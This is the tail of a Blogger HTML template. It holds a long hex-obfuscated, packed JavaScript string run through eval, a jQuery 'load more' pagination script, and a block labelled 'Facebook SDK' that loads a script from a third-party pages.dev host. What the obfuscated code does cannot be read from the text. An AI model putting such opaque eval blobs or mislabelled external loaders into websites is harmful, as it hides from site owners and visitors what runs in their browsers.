c\x6a\x5c\x5c\x74\x5c\x5c\x6c\x5c\x5c\x31\x41\x5c\x5c\x4a\x5c\x5c\x73\x5c\x5c\x75\x5c\x5c\x66\x5c\x5c\x6f\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x43\x5c\x5c\x6f\x5c\x5c\x71\x5c\x5c\x53\x5c\x5c\x4a\x5c\x5c\x71\x5c\x5c\x31\x41\x5c\x5c\x6c\x5c\x5c\x4b\x5c\x5c\x73\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x4c\x5c\x5c\x41\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x4a\x5c\x5c\x48\x5c\x5c\x45\x5c\x5c\x70\x5c\x5c\x71\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x66\x5c\x5c\x44\x5c\x5c\x73\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x6c\x5c\x5c\x6a\x5c\x5c\x31\x31\x5c\x5c\x75\x5c\x5c\x6a\x5c\x5c\x48\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x6c\x5c\x5c\x66\x5c\x5c\x31\x65\x5c\x5c\x67\x5c\x5c\x52\x5c\x5c\x67\x5c\x5c\x71\x5c\x5c\x44\x5c\x5c\x73\x5c\x5c\x6f\x5c\x5c\x45\x5c\x5c\x6c\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x71\x5c\x5c\x4e\x5c\x5c\x74\x5c\x5c\x44\x5c\x5c\x66\x5c\x5c\x43\x5c\x5c\x6f\x5c\x5c\x71\x5c\x5c\x53\x5c\x5c\x4a\x5c\x5c\x71\x5c\x5c\x31\x63\x5c\x5c\x4b\x5c\x5c\x70\x5c\x5c\x73\x5c\x5c\x6c\x5c\x5c\x74\x5c\x5c\x67\x5c\x5c\x48\x5c\x5c\x6a\x5c\x5c\x66\x5c\x5c\x6a\x5c\x5c\x48\x5c\x5c\x41\x5c\x5c\x6a\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x31\x65\x5c\x5c\x71\x5c\x5c\x66\x5c\x5c\x4b\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x45\x5c\x5c\x45\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x43\x5c\x5c\x57\x5c\x5c\x4b\x5c\x5c\x6f\x5c\x5c\x75\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x45\x5c\x5c\x73\x5c\x5c\x6a\x5c\x5c\x75\x5c\x5c\x70\x5c\x5c\x67\x5c\x5c\x43\x5c\x5c\x6a\x5c\x5c\x73\x5c\x5c\x66\x5c\x5c\x68\x5c\x5c\x4f\x5c\x5c\x4f\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x74\x5c\x5c\x6f\x5c\x5c\x48\x5c\x5c\x67\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x70\x5c\x5c\x74\x5c\x5c\x31\x67\x5c\x5c\x45\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x70\x5c\x5c\x74\x5c\x5c\x71\x5c\x5c\x66\x5c\x5c\x43\x5c\x5c\x4a\x5c\x5c\x73\x5c\x5c\x67\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x70\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x31\x37\x5c\x5c\x4d\x5c\x5c\x4f\x5c\x5c\x66\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x71\x5c\x5c\x6f\x5c\x5c\x74\x5c\x5c\x49\x5c\x5c\x66\x5c\x5c\x75\x5c\x5c\x6f\x5c\x5c\x74\x5c\x5c\x6a\x5c\x5c\x67\x5c\x5c\x73\x5c\x5c\x66\x5c\x5c\x53\x5c\x5c\x4a\x5c\x5c\x6a\x5c\x5c\x4a\x5c\x5c\x6a\x5c\x5c\x66\x5c\x5c\x4c\x5c\x5c\x67\x5c\x5c\x75\x5c\x5c\x71\x5c\x5c\x6a\x22\x2c\x22\x22\x2c\x22\x5c\x5c\x4c\x5c\x5c\x73\x5c\x5c\x70\x5c\x5c\x48\x5c\x5c\x57\x5c\x5c\x4b\x5c\x5c\x67\x5c\x5c\x73\x5c\x5c\x57\x5c\x5c\x70\x5c\x5c\x43\x5c\x5c\x6a\x22\x2c\x22\x5c\x5c\x73\x5c\x5c\x6a\x5c\x5c\x45\x5c\x5c\x75\x5c\x5c\x67\x5c\x5c\x44\x5c\x5c\x6a\x22\x2c\x22\x5c\x5c\x31\x49\x5c\x5c\x31\x34\x5c\x5c\x47\x22\x2c\x22\x5c\x5c\x31\x49\x5c\x5c\x41\x22\x2c\x22\x5c\x5c\x49\x22\x5d\x3b\x31\x59\x28\x31\x45\x28\x31\x48\x2c\x31\x47\x2c\x31\x7a\x2c\x31\x44\x2c\x31\x43\x2c\x31\x4a\x29\x7b\x31\x43\x3d\x31\x45\x28\x31\x7a\x29\x7b\x31\x46\x28\x31\x7a\x3c\x31\x47\x3f\x31\x42\x5b\x34\x5d\x3a\x31\x43\x28\x31\x53\x28\x31\x7a\x2f\x31\x47\x29\x29\x29\x2b\x28\x28\x31\x7a\x3d\x31\x7a\x25\x31\x47\x29\x3e\x31\x54\x3f\x31\x4c\x5b\x31\x42\x5b\x35\x5d\x5d\x28\x31\x7a\x2b\x31\x55\x29\x3a\x31\x7a\x2e\x31\x56\x28\x31\x57\x29\x29\x7d\x3b\x31\x4b\x28\x21\x31\x42\x5b\x34\x5d\x5b\x31\x42\x5b\x36\x5d\x5d\x28\x2f\x5e\x2f\x2c\x31\x4c\x29\x29\x7b\x31\x4e\x28\x31\x7a\x2d\x2d\x29\x7b\x31\x4a\x5b\x31\x43\x28\x31\x7a\x29\x5d\x3d\x31\x44\x5b\x31\x7a\x5d\x7c\x7c\x31\x43\x28\x31\x7a\x29\x7d\x3b\x31\x44\x3d\x5b\x31\x45\x28\x31\x43\x29\x7b\x31\x46\x20\x31\x4a\x5b\x31\x43\x5d\x7d\x5d\x3b\x31\x43\x3d\x31\x45\x28\x29\x7b\x31\x46\x20\x31\x42\x5b\x37\x5d\x7d\x3b\x31\x7a\x3d\x31\x7d\x3b\x31\x4e\x28\x31\x7a\x2d\x2d\x29\x7b\x31\x4b\x28\x31\x44\x5b\x31\x7a\x5d\x29\x7b\x31\x48\x3d\x31\x48\x5b\x31\x42\x5b\x36\x5d\x5d\x28\x31\x5a\x20\x32\x30\x28\x31\x42\x5b\x38\x5d\x2b\x31\x43\x28\x31\x7a\x29\x2b\x31\x42\x5b\x38\x5d\x2c\x31\x42\x5b\x39\x5d\x29\x2c\x31\x44\x5b\x31\x7a\x5d\x29\x7d\x7d\x3b\x31\x46\x20\x31\x48\x7d\x28\x31\x42\x5b\x30\x5d\x2c\x31\x52\x2c\x31\x58\x2c\x31\x42\x5b\x33\x5d\x5b\x31\x42\x5b\x32\x5d\x5d\x28\x31\x42\x5b\x31\x5d\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x27\x2c\x36\x32\x2c\x31\x32\x35\x2c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x78\x32\x39\x7c\x78\x32\x38\x7c\x78\x32\x37\x7c\x78\x33\x31\x7c\x78\x32\x45\x7c\x78\x37\x43\x7c\x78\x36\x31\x7c\x78\x33\x32\x7c\x78\x33\x44\x7c\x78\x36\x35\x7c\x78\x32\x44\x7c\x78\x37\x34\x7c\x78\x32\x30\x7c\x78\x32\x43\x7c\x78\x36\x39\x7c\x78\x36\x46\x7c\x78\x37\x33\x7c\x78\x32\x32\x7c\x78\x37\x32\x7c\x78\x36\x45\x7c\x78\x36\x43\x7c\x78\x33\x33\x7c\x78\x32\x34\x7c\x78\x37\x42\x7c\x78\x37\x44\x7c\x78\x32\x46\x7c\x78\x36\x32\x7c\x78\x33\x42\x7c\x78\x36\x34\x7c\x78\x36\x33\x7c\x78\x37\x30\x7c\x78\x33\x34\x7c\x78\x32\x42\x7c\x78\x36\x44\x7c\x78\x36\x37\x7c\x78\x37\x35\x7c\x78\x36\x38\x7c\x78\x36\x36\x7c\x78\x33\x35\x7c\x78\x37\x39\x7c\x78\x33\x30\x7c\x78\x33\x36\x7c\x78\x34\x31\x7c\x78\x37\x36\x7c\x78\x37\x31\x7c\x78\x33\x43\x7c\x78\x33\x45\x7c\x78\x33\x41\x7c\x78\x34\x33\x7c\x78\x36\x42\x7c\x78\x34\x39\x7c\x78\x34\x32\x7c\x78\x34\x36\x7c\x78\x34\x35\x7c\x78\x34\x34\x7c\x78\x34\x43\x7c\x78\x37\x37\x7c\x78\x35\x42\x7c\x78\x35\x44\x7c\x78\x33\x37\x7c\x78\x37\x38\x7c\x78\x35\x34\x7c\x78\x34\x37\x7c\x78\x35\x30\x7c\x78\x35\x33\x7c\x78\x32\x33\x7c\x78\x36\x41\x7c\x78\x34\x38\x7c\x78\x34\x46\x7c\x78\x34\x44\x7c\x78\x34\x42\x7c\x78\x34\x41\x7c\x78\x34\x45\x7c\x78\x35\x31\x7c\x78\x35\x39\x7c\x78\x35\x37\x7c\x78\x33\x46\x7c\x78\x35\x35\x7c\x78\x32\x36\x7c\x78\x35\x32\x7c\x78\x35\x36\x7c\x78\x33\x39\x7c\x78\x32\x31\x7c\x78\x35\x38\x7c\x78\x37\x41\x7c\x78\x35\x41\x7c\x78\x33\x38\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x33\x7c\x78\x35\x46\x7c\x5f\x30\x78\x32\x39\x35\x62\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x35\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x34\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x72\x65\x74\x75\x72\x6e\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x32\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x31\x7c\x78\x35\x43\x7c\x5f\x30\x78\x64\x62\x32\x36\x78\x36\x7c\x69\x66\x7c\x53\x74\x72\x69\x6e\x67\x7c\x78\x32\x35\x7c\x77\x68\x69\x6c\x65\x7c\x78\x32\x41\x7c\x75\x32\x30\x32\x36\x7c\x76\x61\x72\x7c\x36\x32\x7c\x70\x61\x72\x73\x65\x49\x6e\x74\x7c\x33\x35\x7c\x32\x39\x7c\x74\x6f\x53\x74\x72\x69\x6e\x67\x7c\x33\x36\x7c\x33\x35\x32\x7c\x65\x76\x61\x6c\x7c\x6e\x65\x77\x7c\x52\x65\x67\x45\x78\x70\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0a";eval(_WkHDzZ);

//]]>
</script>
  

<!-- Pagination Scripts -->
<b:if cond='data:view.isMultipleItems'>
<script type='text/javascript'>
//<![CDATA[
$(function() {
 $("#load-more-link")["each"](function() {
        var a = $(this),
            b = a["data"]("load");
        if (b) $("#load-more-link")["show"]();
        $("#load-more-link")["on"]("click", function(a) {
            $("#load-more-link")["hide"]();
            $["ajax"]({
                url: b,
                success: function(a) {
                    var c = $(a)["find"](".grid-posts");
                    c["find"](".index-post")["addClass"]("post-animated post-fadeInUp");
                    $(".grid-posts")["append"](c["html"]());
                    b = $(a)["find"]("#load-more-link")["data"]("load");
                    if (b) $("#load-more-link")["show"]();
                    else {
                        $("#load-more-link")["hide"]();
                        $("#blog-pager .no-more")["addClass"]("show");
                    }
                $('.index-post .post-image-link .post-thumb').lazyyard();
                },
                beforeSend: function() {
                    $("#blog-pager .loading")["show"]();
                },
                complete: function() {
                    $("#blog-pager .loading")["hide"]();
                }
            });
            a["preventDefault"]();
        });
    });
});
//]]>
</script>
</b:if>

  
  
  
  
<!-- Facebook SDK -->
<script type='text/javascript'>
//<![CDATA[
(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://rodrigoamorinn-blogspot-template.pages.dev/assets/js/facebook-sdk.js#xfbml=1&version=v3.0';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));

//]]>
</script>  

  
  
<!-- Overlay and Back To Top --> 
  <div class='back-top' title='Back to Top'/>
    <div class='mobile-menu'><div class='footer-menu'/><span class='menu-close-button'/></div>
   <div class='overlay'/>
</body>
</html>
